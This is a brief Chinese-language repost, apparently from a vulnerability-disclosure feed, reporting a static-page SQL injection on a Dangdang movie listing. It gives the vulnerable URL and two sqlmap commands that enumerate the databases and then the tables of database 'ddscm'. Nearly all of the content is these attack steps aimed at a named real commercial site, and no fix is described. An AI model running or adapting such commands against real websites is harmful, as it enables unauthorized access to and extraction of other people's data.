好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

当当网某业务静态SQL注入 - 网站安全 - 自学php

漏洞 页面

 

http://movie.dangdang测试数据/list/longBestSelling_C05*.01_P1.htm

 

 

注入语句:

 

python sqlmap.py -u http://movie.dangdang测试数据/list/longBestSelling_C05*.01_P1.htm --dbms mssql --dbs

 

发现和昨天那个当当图书用的是同一个 数据库 。

 

 

 

注入语句:

 

python sqlmap.py -u http://movie.dangdang测试数据/list/longBestSelling_C05*.01_P1.htm -D ddscm --tables

 

查看更多关于当当网某业务静态SQL注入 - 网站安全 - 自学php的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did14742
  阅读:53次

上一篇: 腾讯某站储存型xss及修复 - 网站安全 - 自学php

下一篇:爱奇艺某功能挖出网站多处存储型XSS - 网站安全